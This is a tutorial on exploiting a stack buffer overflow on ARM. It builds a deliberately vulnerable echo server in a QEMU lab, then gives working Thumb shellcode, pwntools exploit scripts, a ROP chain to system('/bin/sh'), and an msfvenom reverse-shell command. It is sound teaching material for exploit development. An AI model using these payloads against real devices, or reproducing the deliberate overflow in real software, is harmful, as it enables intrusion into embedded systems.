The Linux exploitation series covers stack overflows, ROP chains, and ASLR bypasses; all on x86/x64. But the majority of embedded devices run ARM processors: Cortex-A in routers and phones, Cortex-M in microcontrollers, older ARM7/ARM9 in legacy industrial equipment. ARM’s instruction set, calling convention, and stack layout differ from x86 in ways that directly affect how you write exploits.
This tutorial bridges the gap. You’ll cross-compile a vulnerable network service for ARM using the Buildroot toolchain, deploy it to the QEMU environment, and exploit a stack buffer overflow, covering the ARM-specific techniques needed at each step.
ARM vs x86: What’s different for exploit development
Before writing any code, understand the key architectural differences.
Calling convention
On 32-bit x86, function arguments are pushed onto the stack. On ARM (AAPCS, ARM Architecture Procedure Call Standard), the first four arguments go in registers:
x86: ARM:
push arg3 R0 = arg1
push arg2 R1 = arg2
push arg1 R2 = arg3
call function R3 = arg4
BL function (Branch with Link)
SP → arg5, arg6, ... (if needed)Return address
On x86, CALL pushes the return address onto the stack, and RET pops it. On ARM, BL (Branch with Link) stores the return address in the Link Register (LR / R14), and functions return with BX LR or POP {PC}.
x86 call: ARM call:
CALL func BL func
→ pushes return addr → LR = return addr
to stack (NOT on stack)
→ RET pops it → BX LR returns
Stack has return addr Stack does NOT have return addr
→ overflow can overwrite it → ...unless function saves LRThis is the critical difference for exploitation. If a function never pushes LR to the stack, there’s no return address on the stack to overwrite. But any function that calls another function (a non-leaf function) must save LR, and it saves it to the stack with PUSH {LR} in the prologue.
; Leaf function (no stack return address)
leaf_func:
ADD R0, R1, R2
BX LR ; return via LR register
; Non-leaf function (LR saved on stack — exploitable)
nonleaf_func:
PUSH {R4-R7, LR} ; save LR and callee-saved regs to stack
BL some_other_func ; LR gets overwritten, but old LR is on stack
...
POP {R4-R7, PC} ; pop saved LR directly into PC → returnThe POP {PC} instruction at the end of non-leaf functions is the ARM equivalent of x86’s RET. Overwriting the saved LR value on the stack controls PC on return.
Thumb mode
ARM processors can execute two instruction sets: ARM (32-bit instructions) and Thumb (16-bit instructions, denser code). Most modern ARM binaries use Thumb or Thumb-2. The current mode is indicated by the LSB (least significant bit) of the branch target address:
Address 0x00010000 → ARM mode (bit 0 = 0)
Address 0x00010001 → Thumb mode (bit 0 = 1)When building ROP chains, gadget addresses must have the correct LSB for the instruction mode. Using an ARM-mode address to jump into Thumb code (or vice versa) causes an undefined instruction exception.
No x86-style NOP sled
On x86, 0x90 is a single-byte NOP used for NOP sleds. ARM instructions are 4 bytes (or 2 bytes in Thumb). Any MOV Rx, Rx works as a NOP: 0xE1A00000 (MOV R0, R0) in ARM mode, 0x46C0 (MOV R8, R8) in Thumb. Plan your shellcode padding accordingly.
Building the vulnerable target
Create a simple network daemon with a buffer overflow, cross-compile it for ARM, and deploy it to the QEMU Buildroot environment.
The vulnerable service
// vuln_arm.c — a deliberately vulnerable echo server for ARM
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
// Training anchor for the ROP stage. Real targets usually do not hand you this.
// Mark it used so the linker keeps system() and the "/bin/sh" string available.
__attribute__((used))
void keep_system_available(void) {
system("/bin/sh");
}
void handle_request(int client_fd) {
char buf[128];
char response[256];
// BUG: reads up to 1024 bytes into 128-byte buffer
int n = recv(client_fd, buf, 1024, 0);
if (n <= 0) return;
buf[n < 128 ? n : 127] = '\0'; // won't help — damage already done
snprintf(response, sizeof(response), "Echo: %s\n", buf);
send(client_fd, response, strlen(response), 0);
}
int main() {
int server_fd = socket(AF_INET, SOCK_STREAM, 0);
int opt = 1;
setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(8888),
.sin_addr.s_addr = INADDR_ANY,
};
bind(server_fd, (struct sockaddr *)&addr, sizeof(addr));
listen(server_fd, 5);
printf("Listening on port 8888\n");
while (1) {
int client_fd = accept(server_fd, NULL, NULL);
handle_request(client_fd);
close(client_fd);
}
}Cross-compiling for ARM
Use the Buildroot cross-compilation toolchain from the previous tutorial. Do not hardcode the toolchain tuple; Buildroot names it based on the target ABI you configured.
export BUILDROOT=~/buildroot
export CC="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -type f -name '*-gcc' | head -1)"
export READELF="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -type f -name '*-readelf' | head -1)"
# Compile with debug symbols, no stack protector, no PIE, executable stack
$CC -o vuln_arm vuln_arm.c \
-g -O0 \
-fno-stack-protector \
-no-pie \
-z execstack \
-static
# Verify the binary
file vuln_arm
# vuln_arm: ELF 32-bit LSB executable, ARM, EABI5 version 1, statically linked, ...
$READELF -W -l vuln_arm | grep GNU_STACK
# GNU_STACK ... RWE ... (executable stack for Stage 1)For subsequent stages, remove the executable-stack request:
$CC -o vuln_arm_nx vuln_arm.c \
-g -O0 \
-fno-stack-protector \
-no-pie \
-static
$READELF -W -l vuln_arm_nx | grep GNU_STACK
# GNU_STACK ... RW ... (the binary requests a non-executable stack)Warning
NX depends on the emulated CPU and kernel Removing
-z execstackchanges the ELF stack permission request. Whether the stack is actually non-executable depends on the kernel and emulated CPU. The olderversatilepb/ARM926 target used in the Buildroot lab may not enforce execute-never the way a newer Cortex-A target does. Always verify the runtime mapping in GDB before claiming an NX bypass. If the stack still appears executable, this stage is still useful ARM ROP practice, but it is not demonstrating a real NX bypass on that VM.
Deploying to QEMU
Copy the binary into the Buildroot rootfs and boot:
# Mount the rootfs image
sudo mount -o loop output/images/rootfs.ext4 /mnt
sudo cp vuln_arm /mnt/root/
sudo cp vuln_arm_nx /mnt/root/
sudo umount /mnt
# Boot QEMU with the same configuration from the cross-compiling tutorial,
# adding port 8888 for the vulnerable service
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel output/images/zImage \
-dtb output/images/versatile-pb.dtb \
-drive file=output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-nographic \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::8888-:8888,hostfwd=tcp::1234-:1234The hostfwd flags forward port 2222 for SSH, port 8888 for the vulnerable service, and port 1234 for GDB.
Inside the QEMU VM:
# Lab-only: keep stack addresses stable while learning.
echo 0 > /proc/sys/kernel/randomize_va_space
/root/vuln_arm &When switching to gdbserver, stop the background copy first so it does not keep port 8888 bound:
killall vuln_arm 2>/dev/null || trueFinding the overflow offset
The process is the same as x86, adapted for ARM.
Generating a cyclic pattern
# Using pwntools
python3 -c "from pwn import *; print(cyclic(512).decode())" > pattern.txtSending the pattern
#!/usr/bin/env python3
from pwn import *
r = remote('127.0.0.1', 8888)
r.send(cyclic(512))
r.close()Analyzing the crash in GDB
Run the vulnerable binary under gdbserver inside QEMU:
# In QEMU
gdbserver :1234 /root/vuln_armOn the host, connect with the ARM-aware GDB:
gdb-multiarch -q vuln_arm
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continueAfter sending the pattern, GDB catches the crash:
Program received signal SIGSEGV, Segmentation fault.
0x61616173 in ?? ()
(gdb) info registers
r0 0x0
r1 0x0
...
r4 0x6161616f ← controlled (from POP)
r5 0x61616170 ← controlled
r6 0x61616171 ← controlled
r7 0x61616172 ← controlled
sp 0xbefff100
pc 0x61616173 ← controlled! (saved LR popped into PC)The PC value tells you the offset:
from pwn import *
print(cyclic_find(0x61616173)) # e.g., 144On ARM, the saved LR is often popped into PC via an epilogue such as POP {R4-R7, PC}. In this example crash, the saved LR on the stack was at offset 144 bytes from the start of the cyclic pattern. Treat that number as a measured result, not a rule. Different compiler versions, optimization levels, frame-pointer settings, and local-variable layouts can move buf, response, padding, and saved registers around.
If your crash lands on a different cyclic value, use your value. If the compiler places response[256] between buf and the saved registers, the offset will be much larger than 144.
Stack layout at overflow:
Low address
┌──────────────┐ ← buf[0]
│ buf[128] │
│ (128 bytes) │
├──────────────┤
│ saved R4 │ ← offset 128 (4 bytes, controlled)
├──────────────┤
│ saved R5 │ ← offset 132
├──────────────┤
│ saved R6 │ ← offset 136
├──────────────┤
│ saved R7 │ ← offset 140
├──────────────┤
│ saved LR │ ← offset 144 (→ popped into PC)
└──────────────┘
High addressThe exact registers saved depend on the function’s prologue. Disassemble handle_request to see what your binary does:
(gdb) disas handle_request
0x00010504 <+0>: push {r4, r5, r6, r7, lr}
0x00010508 <+4>: sub sp, sp, #396
...
0x00010640 <+316>: pop {r4, r5, r6, r7, pc}The prologue pushes R4-R7 and LR. The epilogue pops them back, with LR going directly into PC. In this sample layout, offset to saved LR = buffer size (128) + alignment padding + saved registers (R4-R7 = 16 bytes). Reconfirm this whenever you rebuild.
Stage 1: Shellcode on executable stack
With -z execstack, the stack is executable. This is the simplest case.
ARM shellcode
ARM Thumb shellcode for execve("/bin/sh", NULL, NULL):
# Pure Thumb-mode execve("/bin/sh") shellcode.
# Uses SVC 0 (supervisor call) — the ARM equivalent of x86 INT 0x80
shellcode = (
b"\x78\x46" # mov r0, pc ; r0 = current addr + 4 (pipeline)
b"\x08\x30" # adds r0, #8 ; r0 -> "/bin/sh" string
b"\x49\x40" # eors r1, r1 ; argv = NULL (Linux accepts this)
b"\x52\x40" # eors r2, r2 ; envp = NULL
b"\x0b\x27" # movs r7, #11 ; r7 = 11 (SYS_execve)
b"\x00\xdf" # svc 0 ; syscall
b"\x2f\x62\x69\x6e" # "/bin"
b"\x2f\x73\x68\x00" # "/sh\0"
)Note
ARM pipeline and PC reads When you read PC in an instruction, the value isn’t the address of that instruction; it’s the address plus a pipeline offset: +8 in ARM mode, +4 in Thumb mode. This is why
MOV R0, PCat address X givesR0 = X + 4in Thumb. The string begins 12 bytes after the first instruction, soadds r0, #8moves fromX + 4toX + 12.
Or generate with msfvenom:
msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.0.2.2 LPORT=4444 \
-f python -b "\x00"Exploit
#!/usr/bin/env python3
from pwn import *
context.arch = 'arm'
context.endian = 'little'
TARGET = ('127.0.0.1', 8888)
OFFSET_TO_LR = 144 # replace with your cyclic_find result
# Address of buf on the stack — find it in GDB with the -g build:
# (gdb) break handle_request
# (gdb) continue
# (gdb) print &buf
BUF_ADDR = 0xbefff000 # adjust based on your GDB output
# Build payload
payload = b"\xc0\x46" * 40 # Thumb NOP sled (NOP/MOV R8, R8)
payload += shellcode
payload += b"A" * (OFFSET_TO_LR - len(payload)) # pad to saved LR
payload += p32(BUF_ADDR + 1) # +1 for Thumb mode bit
r = remote(*TARGET)
r.send(payload)
r.close()Note
The
+1on the return address is critical. ARM uses the LSB to indicate Thumb mode. The payload starts with a Thumb NOP sled and pure Thumb shellcode, so the branch target must have bit 0 set.
Warning
The
execveshellcode above spawns/bin/shlocally on the target, but the shell’s stdin/stdout are not connected to the TCP socket. You’ll see the crash in GDB (confirming code execution), but you won’t get an interactive shell over the network. For a practical remote shell, use themsfvenomreverse shell payload shown above, or adddup2calls to redirect the socket fd to stdin/stdout before theexecve.
Stage 2: ROP chain after removing execstack
Recompile without -z execstack. Then verify whether the stack is non-executable at runtime:
# In QEMU
killall vuln_arm vuln_arm_nx 2>/dev/null || true
gdbserver :1234 /root/vuln_arm_nx
# On the host
gdb-multiarch -q vuln_arm_nx
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue
# After the process starts
(gdb) info proc mappings
# Look for the stack region:
# rw-p = non-executable stack
# rwxp = executable stack; your VM is not enforcing NX for this mappingIf the stack is rw-p, injected shellcode should fault and ROP is required. If the stack is still rwxp, continue with this section as ROP practice rather than as an NX-bypass claim.
ARM ROP gadgets
ARM ROP gadgets look different from x86. The key chain terminator is POP {PC} (equivalent to x86’s RET), and POP {R0-R3, PC} controls both argument registers and the return address.
Common useful ARM gadgets:
pop {r0, pc} ← set first argument + chain
pop {r0, r1, pc} ← set first two arguments + chain
pop {r4, r5, r6, r7, pc} ← very common (function epilogues)
mov r0, r4; pop {r4, pc} ← move saved value to arg register
blx r3 ← call function pointer in r3Finding gadgets
Use ROPgadget or ropper with ARM support:
ROPgadget --binary vuln_arm_nx --arch ARM
# Or with ropper
ropper --file vuln_arm_nx --arch ARMFor a statically linked binary, you’ll find thousands of gadgets. Key ones to locate:
# Find gadgets that control r0 (first argument)
ROPgadget --binary vuln_arm_nx --arch ARM | grep "pop.*r0.*pc"
# Find gadgets that call system functions
ROPgadget --binary vuln_arm_nx --arch ARM | grep "blx r"Building the chain: system(“/bin/sh”)
For this controlled lab, keep_system_available() intentionally references system("/bin/sh") so the static binary contains both the function and the string. Do not assume this in real targets. In real firmware, confirm symbols and strings first, or build an execve syscall chain instead.
Check the binary before writing the chain:
nm -n vuln_arm_nx | grep ' system$'
ROPgadget --binary vuln_arm_nx --string '/bin/sh'#!/usr/bin/env python3
from pwn import *
context.arch = 'arm'
elf = ELF('./vuln_arm_nx')
TARGET = ('127.0.0.1', 8888)
# Gadget addresses (from ROPgadget output)
POP_R0_PC = 0x00012345 # pop {r0, pc}
POP_R0_R1_PC = 0x00012400 # pop {r0, r1, pc}
POP_R4_R5_R6_R7_PC = 0x00010580 # pop {r4, r5, r6, r7, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100 # mov r0, r4; pop {r4, pc}
SYSTEM_ADDR = elf.symbols['system']
BIN_SH = next(elf.search(b'/bin/sh\x00'))
print(f"system() @ {hex(SYSTEM_ADDR)}")
print(f"/bin/sh @ {hex(BIN_SH)}")
# ROP chain
# Goal: system("/bin/sh")
# Need: R0 = address of "/bin/sh", then call system()
rop = b""
rop += p32(POP_R0_PC) # gadget: pop {r0, pc}
rop += p32(BIN_SH) # r0 = "/bin/sh"
rop += p32(SYSTEM_ADDR) # pc = system() — this calls system(r0)
# Build full payload
OFFSET_TO_LR = 144 # replace with your cyclic_find result
payload = b"A" * OFFSET_TO_LR
payload += rop # overwrites saved LR -> first gadget
r = remote(*TARGET)
r.send(payload)
r.close()This chain calls system("/bin/sh"), but the shell’s stdio still belongs to the service process, not the TCP socket. Use GDB to prove that PC reaches system, or extend the chain with dup2(client_fd, 0), dup2(client_fd, 1), and dup2(client_fd, 2) before execve if you want an interactive socket shell. That socket-reuse pattern is covered in the remote exploitation tutorial.
ARM-specific ROP challenges
Register setup is indirect. On x86, pop rdi; ret directly sets the first argument register. On ARM, function epilogues pop callee-saved registers (R4-R11) and PC, but not argument registers (R0-R3). You often need a two-step chain:
Step 1: pop {r4, pc} → load value into r4
Step 2: mov r0, r4; ... ; pop {pc} → move r4 to r0 (arg register)BLX vs POP {PC}. BLX (Branch with Link and Exchange) saves the return address in LR, which complicates chaining because the next gadget’s address isn’t on the stack. Prefer gadgets that end with POP {PC} for clean chaining.
Thumb interworking. If some gadgets are in ARM mode and others in Thumb mode, ensure addresses have the correct LSB. Mixed-mode chains are possible but require care.
Debugging ARM exploits with GDB
Useful GDB commands for ARM
# Show all registers including CPSR (flags)
(gdb) info registers
# Show CPSR, including the Thumb-state T bit
(gdb) info registers cpsr
# Override disassembly mode when GDB guesses wrong
(gdb) set arm force-mode thumb
(gdb) disas 0x10504
# Examine stack
(gdb) x/20wx $sp
# Set breakpoint at function epilogue
(gdb) break *0x10640
# Step one instruction
(gdb) stepiChecking NX from GDB
(gdb) info proc mappings
# Look for the stack region's permissions
# rw-p = non-executable stack
# rwxp = executable stackExamining the crash
(gdb) info registers pc lr sp
(gdb) x/10i $pc # disassemble at crash point
(gdb) x/20wx $sp # examine stack contentsPractical exercise
- Cross-compile
vuln_arm.cfor ARM with executable stack, deploy to QEMU, and find the exact overflow offset using cyclic patterns - Write and test Thumb shellcode that spawns
/bin/sh, verify in GDB that execution reaches theexecvesyscall - Recompile without
-z execstack, verify the runtime stack mapping, and confirm whether shellcode-on-stack crashes on your VM - Build an ARM ROP chain to call
system("/bin/sh"), verify PC reachessystem, then optionally extend the chain withdup2for a socket-backed shell - Compare the exploit development experience with the x86 tutorials, note how the calling convention and
POP {PC}pattern change your approach
If you’re coming from the x86 exploitation series, the mental model translates directly. The details change but the principles are identical: control the instruction pointer, set up arguments, redirect to a useful function.